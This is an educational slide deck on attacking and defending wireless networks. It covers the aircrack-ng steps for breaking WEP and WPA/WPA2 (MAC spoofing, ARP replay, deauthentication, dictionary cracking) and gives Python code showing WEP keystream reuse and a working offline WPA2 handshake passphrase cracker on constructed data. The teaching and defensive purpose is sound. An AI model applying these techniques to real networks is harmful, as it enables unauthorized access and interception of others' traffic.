
Attack and Defense in Wireless Networks
Presented by Aleksandr Doronin
Outline
Wireless Networks and Security
Attacking and defending WEP
Attacking and defending WPA/WPA2
Common defense techniques
Summary
Wireless Networks and Security
1) What are wireless networks?
A wireless network connects a computer to a router (access point) over radio instead of a physical link.
2) Why do we need them?
They facilitate mobility. You could use lengthy wires instead, but someone might trip over them.
3) Why security?
An attacker may hack a victim's personal computer and steal private data, or may commit crimes using the victim's machine and identity. Because the radio medium is shared, anyone in range can also read wirelessly transferred data with a sniffer.
Wireless Networks and Security
Three security approaches:
1. WEP (Wired Equivalent Privacy)
2. WPA (Wi-Fi Protected Access)
3. WPA2 (Wi-Fi Protected Access, Version 2)
WPA and WPA2 each come in two modes: Personal (one pre-shared passphrase for the network) and Enterprise (per-user 802.1X/EAP authentication against a RADIUS server).
WEP (Wired Equivalent Privacy)
Encryption:
RC4 with a 40-bit key (marketed as "64-bit") or a 104-bit key (marketed as "128-bit")
The difference is the 24-bit IV (initialization vector), which is prepended to the key and sent in the clear with every frame
Keys:
Up to four static keys (key index 1-4) can be configured
Each WEP key is entered either as hexadecimal digits ("0" through "9", "A" through "F") or as ASCII characters: 10 hex digits or 5 ASCII characters for 40/64-bit encryption, 26 hex digits or 13 ASCII characters for 104/128-bit encryption.
WPA/WPA2 Personal
Encryption:
TKIP (WPA; still RC4-based, with per-packet key mixing)
AES-CCMP (WPA2)
Pre-Shared Key:
A passphrase of 8-63 printable ASCII characters (or the raw 256-bit key as 64 hex digits)
Key Renewal:
You can choose a Key Renewal period, which instructs the device how often to rotate the temporal (session and group) keys. The default is usually 3600 seconds. This does not change the pre-shared key itself, so it offers no protection against guessing a weak passphrase.
Attacking WEP
iwconfig: configures wireless adapters. Use it to confirm that the adapter is in monitor mode, which is required for capturing raw frames and for injecting the fake ARP (Address Resolution Protocol) requests sent to the target router.
macchanger: views and/or spoofs (fakes) your MAC address, e.g. to match a client the AP already accepts.
airmon-ng: puts the wireless adapter into monitor mode (rfmon).
airodump-ng: captures packets from a wireless router (otherwise known as an AP) and counts the unique IVs seen per network.
aireplay-ng: performs fake authentication against the AP and replays captured ARP requests, so the AP answers with a flood of new encrypted frames, each carrying a fresh IV.
aircrack-ng: recovers the WEP key from the captured IVs (the statistical PTW attack by default; tens of thousands of IVs are typically enough).
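Why collecting IVs and injecting known ARP frames breaks WEP, as an added example (not code from the slides or from the aircrack-ng suite): it implements WEP's framing on constructed sample packets (a made-up 40-bit key, a made-up IV, a constructed LLC/SNAP+ARP header and a constructed HTTP request) and shows that two frames sharing an IV share one RC4 keystream, so a single known plaintext decrypts the other frame without the key, and how quickly a 24-bit IV space must repeat. Recovering the key itself from many IVs (what aircrack-ng's PTW attack does) is not implemented here.

```python
"""Why the WEP attack works: RC4 keystream reuse under a 24-bit IV."""
import math
import struct
import zlib
from typing import Optional


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA then PRGA), returning `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian (linear, not a MAC)."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as sent on the air: IV (3 bytes, clear) || RC4(IV||key) XOR (data||ICV)."""
    if len(iv) != 3 or len(wep_key) not in (5, 13):
        raise ValueError("WEP uses a 24-bit IV and a 40- or 104-bit key")
    body = plaintext + icv(plaintext)
    ks = rc4(iv + wep_key, len(body))
    return iv + bytes(a ^ b for a, b in zip(body, ks))


def wep_decrypt(wep_key: bytes, frame: bytes) -> bytes:
    """Receiver side: strip the IV, regenerate the keystream, check the ICV."""
    iv, body = frame[:3], frame[3:]
    ks = rc4(iv + wep_key, len(body))
    clear = bytes(a ^ b for a, b in zip(body, ks))
    data, tag = clear[:-4], clear[-4:]
    if tag != icv(data):
        raise ValueError("bad ICV")
    return data


def recover_with_known_plaintext(known_frame: bytes, known_plaintext: bytes,
                                 target_frame: bytes) -> Optional[bytes]:
    """Attacker side, no key. Frames with the same IV were encrypted with the
    same keystream, so keystream = known ciphertext XOR known plaintext (plus
    its ICV, which the attacker can compute), and that keystream decrypts the
    same number of bytes of the target frame."""
    if known_frame[:3] != target_frame[:3]:
        return None  # different IV, different keystream: nothing to do
    known_clear = known_plaintext + icv(known_plaintext)
    ks = bytes(c ^ p for c, p in zip(known_frame[3:], known_clear))
    n = min(len(ks), len(target_frame) - 3)
    return bytes(c ^ k for c, k in zip(target_frame[3:3 + n], ks[:n]))


def frames_until_iv_repeat() -> int:
    """Birthday bound on the 24-bit IV space: expected frames before some IV
    repeats even with perfectly random IVs (many cards simply count up)."""
    return round(math.sqrt(math.pi / 2 * 2 ** 24))


def demo() -> Optional[bytes]:
    # Constructed sample traffic: a made-up 40-bit key and one IV used twice.
    key = bytes.fromhex("0a1b2c3d4e")
    iv = bytes.fromhex("010203")
    # A frame the attacker knows in full (the ARP request aireplay-ng injects);
    # constructed LLC/SNAP + ARP header bytes, not a real capture.
    arp = bytes.fromhex("aaaa030000000806" "0001080006040001")
    # A victim's frame the attacker wants to read (constructed).
    secret = b"GET /login?user=alice&pw=hunter2 HTTP/1.1"
    frame_known = wep_encrypt(key, iv, arp)
    frame_secret = wep_encrypt(key, iv, secret)
    return recover_with_known_plaintext(frame_known, arp, frame_secret)


if __name__ == "__main__":
    print(demo())                    # b'GET /login?user=alic'
    print(frames_until_iv_repeat())  # 5134
```

The recovered prefix is exactly as long as the known plaintext plus ICV; injecting a known frame over and over (which is what the ARP replay does) and watching the AP re-encrypt it under counting IVs is what turns this into a full keystream dictionary, and the CRC-32 ICV adds nothing because it is linear and can be fixed up after flipping ciphertext bits.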
How to defend when using WEP
Use longer WEP encryption keys, which makes the data analysis task more difficult, if your WLAN equipment supports 128-bit WEP keys. This only slows the attack: 104-bit keys fall to the same IV-based attacks once somewhat more traffic has been captured.
Change your WEP keys frequently. Some devices support "dynamic WEP", which is outside the standard but uses 802.1X to assign a different WEP key to each user and session, limiting how much traffic an attacker can collect under any one key.
Use a VPN over the wireless link for any traffic that may include sensitive information, whatever the link-layer protection (including WEP).
Implement a different technique for encrypting traffic, such as IPsec over wireless. To do this, you will probably need to install IPsec software on each wireless client, install an IPsec gateway in your wired network, and put the access points on a VLAN that reaches only that gateway.
None of this makes WEP itself secure; the real fix is to migrate to WPA2.
Attacking WPA
macchanger: views and/or spoofs (fakes) your MAC address.
airmon-ng: puts the wireless adapter into monitor mode (rfmon).
airodump-ng: captures packets from a wireless router (otherwise known as an AP) and records the WPA/WPA2 4-way handshake when a client connects.
aireplay-ng: here its role is deauthentication rather than ARP replay. Sending deauth frames forces a connected client to reauthenticate, so the handshake can be captured without waiting for a new client. Generating new IVs is a WEP-only technique and does not apply to WPA.
aircrack-ng: recovers the WPA/WPA2 passphrase by testing each word in a dictionary against the captured handshake. Nothing is "decrypted": each candidate is derived and checked offline, so the attack is only as good as the wordlist.
How to defend when using WPA
Passphrases: the only practical way to crack WPA-Personal is to capture the 4-way handshake and then guess the passphrase offline. The handshake carries nonces and a MIC computed from the PMK, never the PMK or the passphrase itself, so every guess must be derived (4096 PBKDF2 rounds) and checked against the MIC. If the passphrase is extremely complicated it will be almost impossible to crack.
Passphrase Complexity: select a random passphrase that is not made up of dictionary words. Select a complex passphrase of a minimum of 20 characters in length and change it at regular intervals.
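The offline attack described above, and the reason a long random passphrase defeats it, as an added example for both the "Attacking WPA" steps and this slide (not code from the slides or from aircrack-ng): it derives PMK, PTK and the EAPOL-Key MIC the way WPA2-Personal with AES-CCMP does (key descriptor version 2, HMAC-SHA1), plays the client's side of handshake message 2 for a constructed network (made-up SSID, MACs, nonces and a minimal EAPOL-Key frame without key data), and then recovers the passphrase from only what a sniffer would have seen, by trying a wordlist. The one real value in it is the IEEE 802.11 test vector checked in the test (passphrase "password", SSID "IEEE").

```python
"""What aircrack-ng does with a captured WPA2 4-way handshake and a wordlist."""
import hashlib
import hmac
import struct
from typing import Iterable, Optional


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).
    This is the whole cost of one guess; passphrase length multiplies the guesses."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """PTK for CCMP (384 bits) = KCK(16) || KEK(16) || TK(16); only public inputs besides the PMK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


MIC_OFFSET = 81  # EAPOL header (4) + EAPOL-Key fields that precede the MIC (77)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2, key descriptor version 2: MIC = HMAC-SHA1-128(KCK, frame with MIC field zeroed)."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 (RSN descriptor, empty key data), MIC zeroed.
    Constructed for this example; a real message 2 also carries the RSN IE."""
    body = (b"\x02"                       # descriptor type: RSN
            + struct.pack(">H", 0x010A)   # key info: version 2, pairwise, MIC present
            + struct.pack(">H", 16)       # key length
            + struct.pack(">Q", 1)        # replay counter
            + snonce                      # key nonce
            + b"\x00" * 16                # key IV
            + b"\x00" * 8                 # key RSC
            + b"\x00" * 8                 # reserved
            + b"\x00" * 16                # MIC (filled in by the client)
            + struct.pack(">H", 0))       # key data length
    return b"\x02\x03" + struct.pack(">H", len(body)) + body  # EAPOL v2, type EAPOL-Key


def crack(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
          eapol: bytes, mic: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """The offline attack: everything except the wordlist was read off the air."""
    for candidate in wordlist:
        kck = derive_ptk(derive_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), mic):
            return candidate
    return None


def constructed_handshake(passphrase: str, ssid: str):
    """Play the client's side of message 2 so we have a 'capture' with a known answer.
    MACs and nonces are made up; this is not a real network."""
    ap_mac = bytes.fromhex("00112233aabb")
    sta_mac = bytes.fromhex("66778899ccdd")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    eapol = build_msg2(snonce)
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]  # frame as transmitted
    return ssid, ap_mac, sta_mac, anonce, snonce, eapol, mic


def demo() -> Optional[str]:
    capture = constructed_handshake("sunshine2012", "HomeNet")  # weak, and in the list
    wordlist = ["password", "letmein", "HomeNet", "sunshine2012", "welcome1"]
    return crack(*capture, wordlist)


if __name__ == "__main__":
    print(demo())  # sunshine2012
```

With a real capture file the same loop is what `aircrack-ng -w wordlist.txt -b <BSSID> capture.cap` runs over the handshake; the SSID acting as PBKDF2 salt is also why precomputed tables only work per network name, and why a 20-character random passphrase is out of reach for any wordlist.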
Common defense techniques
Change the router's default user name and password
Change the internal IP subnet if possible
Change the default name and hide broadcasting of the SSID (Service Set Identifier)
None of the attack methods gets faster or more effective when a longer passphrase is used; length only raises the attacker's cost
Restrict access to your wireless network by filtering access based on MAC (Media Access Control) addresses
Note that a hidden SSID and MAC filtering are easily bypassed: a sniffer sees the SSID in probe and association frames and can copy an allowed client's MAC with macchanger. Treat them as hygiene, not as security.
Use Encryption
Summary
Change all possible default router settings
Use encryption (WPA/WPA2)
Use long and complex keys/passphrases
Thank you!
References
http://www.backtrack-linux.org/
http://www.aircrack-ng.org/
http://www.youtube.com/results?search_query=cracking+WEP+and+WPA+with+backtrack